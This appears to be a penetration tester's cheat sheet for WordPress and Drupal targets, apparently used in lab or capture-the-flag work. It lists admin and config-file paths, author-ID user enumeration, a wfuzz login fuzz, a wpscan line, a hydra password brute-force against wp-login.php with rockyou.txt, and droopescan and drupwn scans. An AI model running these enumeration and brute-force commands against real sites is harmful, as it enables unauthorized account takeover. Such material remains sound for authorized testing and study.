cms-explorer -url http://10.11.1.111 -type [Drupal, WordPress, Joomla, Mambo]
###### Interesting path/pages
# admin login
/wp-admin
/wp-login
# Configuration files
setup-config.php
wp-config.php
# enumerate user
/?author=1, /?author=2,
# Scanning workpress for
wscan -e vp --plugins-detection aggressive --api-token <API>--url <URL> --disable-tls-checks
#User enum
wfuzz -c -u http://<IP>/wp-login.php -z file,/opt/SecLists/Usernames/Names/names.txt -d "log=FUZZ&pwd=pass&wp-submit=Log+In&redirect_to=http%3A%2F%2Ffunbox.fritz.box%2Fwp-admin%2F&testcookie=1" --hw 308
# bruteforcing using hydra
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt http://10.10.224.210/retro -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
#https://github.com/droope/droopescan
./droopescan scan drupal -u 10.10.10.13
#https://github.com/immunIT/drupwn
python3 drupwn <URL>
